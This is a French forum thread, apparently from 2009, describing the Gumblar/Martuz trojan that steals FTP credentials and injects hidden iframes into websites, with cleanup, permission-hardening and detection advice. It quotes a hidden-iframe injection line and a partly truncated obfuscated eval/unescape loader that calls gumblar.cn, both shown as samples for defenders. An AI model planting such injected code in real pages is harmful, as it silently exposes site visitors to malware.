ATTAQUES SITES WEB PAR IFRAMES : PROBLEMES ET SOLUTIONS (Gumblar, Martuz, etc.)

[chbj]

Attaques Sites Web par Iframes (et similaires) :
Problèmes et Solutions (Gumblar, Martuz, etc.)

Ce post (en 2 parties, à cause des limites du forum) explique comment de nombreux sites Web peuvent voir le code de leur pages modifié par des systèmes viraux ("virus") malveillants qui y incluent des connections cachées vers des sites également malveillants.

Ces systèmes viraux de type « trojans » (« cheval de Troie ») sont installés sur les PC des webmasters et détectent les codes FTP pour les utiliser et permettre la modification des pages web qui deviendront à leur tour des vecteurs de contagion.

Les contagions connues jusqu’ici ont été effectuées par le biais de versions anciennes (mais très utilisées) des logiciels Adobe Reader (PDF Reader) pour la lecture de fichiers au format PDF, et Adobe Flash Player pour la lecture de fichiers au format Flash. Mais des failles d’autres logiciels peuvent évidemment être utilisés.

Des solutions et méthodologies pour faire face à ces attaques sont proposées.


Introduction :

Tout spécialement depuis mai 2009, mais également auparavant pour une moindre part, des webmasters ont vu des lignes de code étranges apparaître dans leur pages web, et celles-ci se connecter à des sites hautement suspects, de manière invisible pour l'utilisateur ordinaire.

Souvent, les webmasters eux-mêmes ne réalisent le problème que par hasard, en éditant un fichier par exemple.

Typiquement, la forme la plus banale du code malicieux introduit ressemble plus ou moins à ceci :

Code:

<iframe src="http://sitesuspect:8080/index.php" width=107 height=152 style="visibility: hidden"></iframe>

Un iframe est, en termes courants, une sorte de cadre sur une page web, cadre qui connecte directement cette page web à une autre, faisant apparaître cette autre page dans le cadre. Mais l’iframe peut être formaté pour être invisible !

Bien que très pratique, la fonction iframe n'offre aucune sécurité pour l'utilisateur final qui se trouve connecté -parfois sans le savoir- à un autre site/page presque comme s'il s'y était connecté directement. Si l'autre site/page est malveillant ou simplement mal sécurisé, les conséquences peuvent être graves. (Evidemment, si l'autre site/page est sécurisé et bien contrôlé, par exemple en appartenant au même webmaster, ce problème ne se pose pas.). Pour ces raisons, l’usage de l’iframe n’est pas recommandé.

Pour complique les choses, depuis mai 2009, des codes malicieux beaucoup plus complexes et furtifs ont fait leur apparition et sont extrêmement difficiles à détecter sur des pages un tant soit peu sophistiquées.

Par exemple (code volontairement altéré avec « …… » et des parties supprimées) :

Code:

(function(jil){var xR5p='%';eval(unescape(('var"20a"3d"22Sc"72iptEngin"65"22"2c"62"3d"22"56ers"69on()+"22"2c"6a"3d"22"22"2cu"3dnavig"61t"6 …………… "65rAgent"3bif(("75"2eind"65xOf"28"22Win"22)"3e0)"26"26(u"2e"69n"64exO"66("22NT"20"36"22"29"3c0)"26"26(documen"74"2ecookie"2e"69ndex"4f"66"28"22"6die"6b"3d1"22)"3c0)"26"26"28t"79"70e"6ff ………………………………  3bdocu"6de"6e"74"2ewr"69"74e("22"3csc"72ipt"20sr"63"3d"2f"2fgumblar"2ecn"2frss"2f"3fid"3d"22+j+"22"3e"3c"5c"2f"73cript"3e"22"29"3b"7d').replace(jil,xR5p)))})(/"/g);

[Note pour les programmeurs : la plupart du temps, la fonction n’a pas de nom. Elle est anonyme et s’auto-appelle (self-invoking)]

Ces attaques sont l’œuvre de variantes du virus de type "trojan" Gumblar (du nom du site -aujourd'hui disparu- vers lequel il dirigeait l'iframe), devenu par la suite Martuz (plus difficile à détecter car cachant mieux les URL malicieuses), et ayant, comme on vient de le dire, encore évolué depuis. (De pire en pire.)


Principe de la contagion (en très résumé) :

Ces trojans utilisent des faiblesses de certains logiciels : Adobe Reader (aussi appelé PDF Reader, Acrobat Reader), et Adobe Flash Player. (A noter que rien n'empêche théoriquement d'utiliser des faiblesses d'autres logiciels similaires.)

La contamination s'effectue donc la plupart du temps par l'intermédiaire de ces logiciels par les fichiers qu'ils téléchargent / jouent.

Une fois le PC contaminé, il va à son tour tenter de propager la contagion de la manière suivante : il recherche des codes FTP présents sur l'ordinateur, et les utilise pour placer l'iframe malicieux sur les sites accessibles par le FTP. Ces sites contamineront d'autres PC, et ainsi de suite.

La méthode est de plus en plus sophistiquée: par exemple, comparer (sites en anglais) :
http://blog.unmaskparasites.com/2009...jected-script/
http://blog.unmaskparasites.com/2009...mblar-exploit/

Les pages web affectées sont le plus souvent les pages du type index.php, index.htm, index.html, etc. (Ceci nous permettra de proposer plus loin une méthode de détection de la contagion.) Mais toute page peut être affectée (y compris si le virus fait une « erreur »). Les « templates » ou autres fichiers servant à générer des pages web dynamiques (forums, CMS, Blogs, wikis,…) peuvent également être contaminés, et le sont désomais de plus en plus.



Résolution :

1) Pour TOUS les PC susceptibles d'être contaminés, même si on pense qu'il ne le sont pas :[INDENT]
- Videz les caches de votre navigateur quand vous nettoyez votre système ou simplement suspectez une attaque. Videz-les avant de commencer un examen ou un nettoyage ; videz-les après également ; et vides-les plusieurs fois par sécurité pendant les opérations et systématiquement si vous pensez être passé sur une page contaminée.

- Télécharger les dernières versions de Adobe Reader et Adobe Flash Player, de préférence sur une machine sûre. (Il se peut que d'autres logiciels soient aujourd'hui en cause, mais il faut bien commencer par ce qui est connu !)

- Désinstaller totalement Adobe Acrobat Reader et Adobe Flash Player sur les PC.

- Mettre à jour ses anti-virus. (Il se trouve que l'anti-virus AVAST -même la version gratuite- a été le premier capable de détecter et éradiquer Gumblar en mai dernier, mais cela aurait pu être un autre produit : un anti-virus ne vaut que ce que vaut son actualisation et la rapidité de celle-ci.)
Il peut être souhaitable, dans les cas extrêmes, de lancer l'antivirus à partir d'un CD-ROM bootable propre mais normalement cela n'est pas nécessaire avec cette famille de virus.

- Lancer son anti-virus et faire un scan complet.

- Supptrimer autant que possible tous les fichiers inutiles de votre PC

- Ensuite installer les dernières versions de Adobe Acrobat Reader et Adobe Flash Player[

- Profitez-en pour mettre à jour vos autres plug-ins, add-ons, etc.
Voir aussi plus bas: "Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés"/INDENT]

2) Sur TOUS les sites pour lesquels vous avez des accès FTP, même si vous pensez qu'ils ne sont pas contaminés :

-Restaurer à partir d'une sauvegarde saine, ou générer les pages à nouveau. Et changer vos codes FTP (au moins le mot de passe).
Sinon, sans fichiers propres, voilà la galère :

- Changer vos codes FTP (au moins le mot de passe)

- Avant de nettoyer votre site, videz le(s) cache(s) de vos sites web si ceux-ci mettent des pages en cache ! (C'est normalement le cas sur CMS, blogs, forums, wikis, etc.)Et n'oubliez pas le pages statiques générées par certains add-ons de CMS pour se substituer aux pages dynamique quand il n'est pas nécessaire que la page soit recréée à chaque fois.

- Rechercher le terme "iframe" dans toutes les pages. (OUi, c'est très pénible.)
Pour des logiciels permettant la recherche sur fichiers multiples, voire note à la fin du second messages de ce How-To.

- Rechercher aussi le terme "iframe" dans tous les templates (ou autre terminologie) utilisés par vos Forums, CMS, Blogs, Portails, etc. pour créer les pages dynamiques.

- Vérifier si l'usage de l'iframe est légitime ou non (normalement un codeur ne pas pas utiliser d'iframe dans son travail sauf s'il est totalement obligé de le faire)

- Supprimer les lignes de codes se rapportant à l'iframe illégitime. Attention, plus le virus est malin, plus cette opération peut être difficile. (Par exemple, s'il a utilisé plusieurs lignes d'instructions pour produire le même effet que la ligne de type classique citée plus haut.)

- Faire de même avec "script src=", pour les Martuz-like
(Voir http://blog.unmaskparasites.com/2009...mblar-exploit/ )

- Faire de même avec " “(function(“ " et éventuellement d'autres choses (et là ça peut être l'enfer).
Pour un descriptif complet des scripts, voir :
http://blog.unmaskparasites.com/2009...jected-script/
http://blog.unmaskparasites.com/2009...mblar-exploit/

- Faire évidemment un nouveau backup du site. Et vérifier que les anciens backups ne sont pas contaminés !

- Il peut être souhaitable de lancer des recherches sur les chaînes de caractères suspectes pour déceler du code mieux dissimulé, par exemple sur "visibility: hidden", voire, si l'on est réellement inquiet sur "http://" et vérifier les URL... ce qui sera évidemment pénible.

Demander à toutes les personnes ayant possédé les codes de vos FTP qu'elles fassent impérativement la même chose sur TOUS leurs PC et TOUS leurs propres sites !

Suite dans le post ci-dessous

Mots-clés pour la recherche sur le forum : adobe acrobat PDF reader flash player iframe attaque piraté hacké sécurité virus trojan gumblar martuz attaque FTP codes how-to permissions index

[chbj]

Suite du post précédent

3) Appliquez une (pénible) mesure de sécurité de base consistant à modifier les droits des dossiers et fichiers pour gêner les tentatives de piratage, sauf impossibilité technique :[INDENT]- Mettre tous les dossiers en droits 505 *
- Mettre tous les fichiers en droits 404, y compris les .htaccess et divers "config" *
- Pour un dossier qui nécessite des droits d'écriture par le serveur, utiliser 705
- Pour un fichier qui nécessite des droits d'écriture par le serveur, utiliser 604
- Vérifiez que le dossier racine web, le "www", est bien en 705. Il n'y a pas de raison de le changer.

* Attention : Ces réglages vous empêchent de mettre à jour vos CMS, forums, etc.; ou d'installer des"Mods", add-ons, etc. Préalablement à de telles opérations :

- Passer les fichiers en 604
- Passer les dossiers en 705

et, quand vous avez fini, remettez 404 et 505.

Si vous ne voulez pas le faire pour tous les fichiers, faîtes-le au moins pour les fichiers index.* Ce sera mieux que rien.

4) Mesure éventuelle de sécurité supplémentaire :
Si vous n'êtes pas sûrs de votre sécurité FTP sur votre PC, utilisez éventuellement Linux pour faire du FTP (divers clients FTP disponibles). Ce n'est pas que Linux soit invulnérable (après tout, le premier virus "Ver" de l'histoire de l'informatique était sous Unix), c'est seulement que les créateurs de sytèmes viraux pour PC privilégient les systèmes les plus répandus, et donc Windows. C'est plus rentable



Références (parmi d'autres), en anglais :

Remove Gumblar :
http://www.webologist.co.uk/2009/05/...to-remove.html

Autres sources :
http://www.scmagazineus.com/Gumblar-...rticle/136836/
http://www.computerweekly.com/Articl...xaggerated.htm

Explications sur les mutations du virus (Gumblar vers Martuz à titre d'exemple) :
http://blog.unmaskparasites.com/2009...mblar-exploit/

Descriptif complet de certaines versions de scripts "furtifs" :
http://blog.unmaskparasites.com/2009...jected-script/
http://blog.unmaskparasites.com/2009...mblar-exploit/

Information sur les logiciels Adobe concernés :
http://www.adobe.com/support/securit...html#readerwin
http://www.adobe.com/support/security/index.html#flash
http://www.adobe.com/support/security/index.html (home page sécurité)

Détection éventuelle d’une contagion future par la méthode du "pot de miel" ("honeypot") :

On a vu que les codes malicieux étaient de plus en plus complexes et donc difficile à repérer dans des pages elles-mêmes complexes, comme c’est souvent le cas maintenant sur le web.

Toutefois, les pages web affectées sont le plus souvent les pages du type index.php, index.htm, index.html, etc.

Il est donc -sans garantie absolue de réussite- possible de créer des pages « index » témoins extrêmement simples et facile à lire, avec juste le code minimal d’une page html ou php, etc. à des endroits où elles ne servent à rien.

Par exemple, si votre vrai index est index.php, créez un index.html, etc. (Attention, vous pouvez avoir besoin de configurer un fichier .htaccess pour être bien sûr que votre site continuera à utiliser le bon index ! Se reporter aux documentations appropriées.)

Vous pouvez aussi placer des pages index dans des dossiers volontairement vides. (Même remarque que ci-dessus : veillez aux règles sur les pages index.)

Avec un peu de chance, le système viral sera « attiré » par ces fausses pages index (abeilles et pot de miel) et les infectera toutes. Or, vos pages témoins sont faciles à lire. Dans ce cas, vous pourrez vous rendre compte de l’attaque, et, en prime, voir clairement le code utilisé !

Attention : on ne peut évidemment pas garantir le succès de cette méthode.



Note importante :

Ainsi que je l'ai dit, rien n'empêcherait d'utiliser d'autres logiciels que ceux cités ici pour réaliser le même type de contamination. Il est même vraisemblable que cela sera essayé tôt ou tard ou même l'a peut-être déja été. Il est donc absolument impératif d'utiliser des anti-virus ET des anti-malware à jour ET de veiller à la mise à jour de vos plug-ins de navigateurs et dispositifs similaires..

Dans le cas où, sur des PC suspects, un anti-virus ne donne rien, il peut être judicieux de le désinstaller et en installer un autre pour faire un nouveau test. (Désinstaller n'est pas strictement obligatoire, mais généralement les anti-virus cohabitent mal.)



Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés
(Ajouté le 6 octobre 2009, au stade de semi-beta de la page/)

Firefox 3.5.3 et 3.0.14 pouvaient vous avertir des plug-ins Adobe Flash Player, ici:
http://en-us.www.mozilla.com/en-US/f....5.3/whatsnew/
toutefois Mozilla a décidé d'aller plus loin.

Face aux problèmes causés par l'utilisation de failles de sécurité dans les Plug-ins périmés (notamment Adobe Flash Player, voir le How-To), Mozilla vient d'ouvrir une page semi-beta permettant de savoir quels sont vos plug-ins périmés et de les mettre à jour.

Voici l'annonce:
http://blog.mozilla.com/webdev/2009/...eds-your-help/

Et voici la page:
https://www-trunk.stage.mozilla.com/en-US/plugincheck/

Attention, vous aurez un avertissement de sécurité à cause d'un certificat qui ne fonctionne pas au moment d'écrire ces lignes. (Bien joué, Mozilla! )
Il faut utiliser la fonction "ajouter une exception" pour utiliser cette page de détection des plug-ins.






Logiciels permettant la recherche d'une chaîne de caractères sur plusieurs fichiers à la fois :

Notepad++, excellent éditeur (gratuit), possède une fonction de recherche sur multiples fichiers, et un plug-in pour travailler avec un FTP. (Maintenant fourni avec la version complète gratuite.)
http://notepad-plus.sourceforge.net/uk/site.htm

Il y a aussi (merci à cbfr) File Seeker :
http://www.softpedia.com/get/System/...e-Seeker.shtml

Dans les deux cas, toutefois, il faut avoir les fichiers sur son ordinateur Windows pour pouvoir les explorer. (Donc éventuellement les recopier depuis le FTP.)



Voilà, c'est résumé () mais j'espère que ça a été utile.



Mots-clés pour la recherche sur le forum : adobe acrobat PDF reader flash player iframe attaque piraté hacké sécurité virus trojan gumblar martuz attaque FTP codes how-to permissions index


Edit:
- 4 août 2009, ajout des informations sur les logiciels permettant la recherche sur fichiers multiples.[
- 22 août 2009, ajout d'information sur les caches des navigateurs, les pages mises en cache sur le FTP par les CMS, forums, etc., la sécurité par modification des droits sur les fichiers et dossiers, usage de clients FTP Linux, divers petits changements
- Septembre 2009, modifications mineures pour souligner l'extensions des risques.
- 6 octobre 2009, ajout de l'information "Bonne nouvelle pour les utilisateurs de Firefox :
une page Web de Mozilla pour signaler les plug-ins périmés"

[chbj]

Note accessoire :
Vous pouvez éventuellement, si cela vous convient, et avec les réserves d'usage, utiliser le lecteur de PDF Foxit, au lieu du lecteur "originel" d'Adobe. (Les logiciels "officiels" sont généralement plus attaqués que les logiciels "alternatifs".) Il existe une version gratuite.
http://www.foxitsoftware.com/pdf/reader/
(Logiciel suggéré par Daweb)

[cbfr]

Citation:

- Rechercher le terme "iframe" dans toutes les pages. (OUi, c'est très pénible.)

le logiciel fseeker (gratuit) permet de rechercher des mots, suite de mots, chaînes etc. directement a partir de la racine ou de répertoire et/ou par type de fichier (php, html, inc, css ...)

For Windows only
Un outil très pratique.

Mots-clés pour la recherche sur le forum : adobe acrobat PDF reader flash player iframe attaque piraté hacké sécurité virus trojan gumblar martuz attaque FTP codes how-to

[chbj]

Citation:

Envoyé par cbfr

le logiciel fseeker (gratuit) permet de rechercher des mots, suite de mots, chaînes etc. directement a partir de la racine ou de répertoire et/ou par type de fichier (php, html, inc, css ...)

For Windows only
Un outil très pratique.

Merci cbfr. J'avais oublié de mentionner dans le How-to ce que j'avais dit dans une réponse quelque part : Notepad++, excellent éditeur (gratuit), possède une fonction de recherche sur multiples fichiers, et un plug-in pour travailler avec un FTP. (Maintenant fourni avec la version complète gratuite.)
http://notepad-plus.sourceforge.net/uk/site.htm


Pour fseeker, en fait File Seeker, que tu mentionnes, voilà le lien pour les lecteurs du forum :
http://www.softpedia.com/get/System/...e-Seeker.shtml

Dans les deux cas, toutefois, il faut avoir les fichiers sur son ordinateur Windows pour pouvoir les explorer. (Donc éventuellement les recopier depuis le FTP.)

Sinon, il y a un programme payant (pas trop cher pour une "Personal Home License")

HandyFile Find and Replace - Text Workbench version
http://www.silveragesoftware.com/sea...text-tool.html

Si quelqu'un connaît autre chose, moins cher ou éventuellement gratuit... suggestions bienvenues !


J'édite le How-To avec ces informations.

[masterboy]

Citation:

Un iframe est, en termes courants, une sorte de cadre sur une page web, cadre qui connecte directement cette page web à une autre, faisant apparaître cette autre page dans le cadre. Mais l’iframe peut être formaté pour être invisible !

Je ne comprend pas comment l'iframe peut être invisible, tu veux dire que la taille est de 0 pixel sur 0 pixel et que donc personne ne peut la voir sauf dans le code source ? Donc le script de la page appelé s'effectue sans qu'on voit cette page ?

[lifedaniel]

Sous firefox en tout cas, après l'attaque que j'ai reçu par ses iframes, le code était visible. Mais le plus ennuyant c'est que lors de l'ajout de code, il supprime du code à vous en fin de page.

[chbj]

Citation:

Envoyé par masterboy

Je ne comprend pas comment l'iframe peut être invisible, tu veux dire que la taille est de 0 pixel sur 0 pixel et que donc personne ne peut la voir sauf dans le code source ? Donc le script de la page appelé s'effectue sans qu'on voit cette page ?

Il suffit d'un tag de CSS style="visibility: hidden". Tu as l'exemple dans le code-type en une ligne que je donne au début.

Par exemple :

Code:

<iframe src="http://www.ovh.com" width=107 height=152></iframe>

est un iframe visible, mais

Code:

<iframe src="http://www.ovh.com" width=107 height=152 style="visibility: hidden"></iframe>

est un iframe invisible. Il suffit ensuite qu'il soit bien placé dans la page, mais on peut évidemment faire plus sophistiqué !

Citation:

Envoyé par lifedaniel

Sous firefox en tout cas, après l'attaque que j'ai reçu par ses iframes, le code était visible. Mais le plus ennuyant c'est que lors de l'ajout de code, il supprime du code à vous en fin de page.

Le code, par définition, sera toujours visible. C'est l'iframe qui peut être dissimulé. Toutefois, comme expliqué dans mon How-To, le code peut être habilement dissimulé et ne plus être la simple ligne citée dans mon premier example.

Toutefois, si l'injection du code malveillant supprime du "bon" code sur la page, c'est que l'on a affaire à quelqu'un de peu doué (mais le code reste dangereux), car, par principe, un système viral malveillant ne doit pas éveiller les soupçons du propriétaire de site.

Edit 5 août 2009: typographie

[Arlacais]

Bonjour,
Tous mes sites ont attrapé ce m...
Autant sur 1&1 que sur Ovh . J'ai pour l'instant peu de fichiers sur OVH

J'ai trop de fichiers chez 1&1 pour les descendre sur mon PC
Je me suis connecté en mode terminal avec "putty"
Les fichiers infectés sont index.php , index.htm ou html et même un fichier configurer.php
En mode commande, je vérifie les fichiers infectés avec :
> find . -type f -name "*" -exec grep iframe '{}' \;
mais cela ne montre pas ou ils se trouvent sur l'arborescence

Pour cela je fais une liste de tous les fichiers présents avec :
find . -type f -name "*" -exec ls -l '{}' \; > liste_fichiers
ensuite faut un peu modifier la liste :
- supprimer le début de chaque ligne pour ne garder que ./rep1/fich1
Ensuite j'ai créé un petit shell "chercher" par exemple :
for i in `cat liste_fichier
do
echo $i
grep $i iframe | grep 8080
done

et je lance :
> sh chercher

Bon si vous avez plus simple, je suis preneur

Par contre je ne sais pas si on connait le nom du script incriminé

A suivre
Christian

[Arlacais]

Rectificatif

j'ai oublié un ` en fin de ligne , lire :
for in in `cat liste_fichier`


Je n'ai pas encore tout automatisé mais cela devrait être possible
avec la commande "sed"

Christian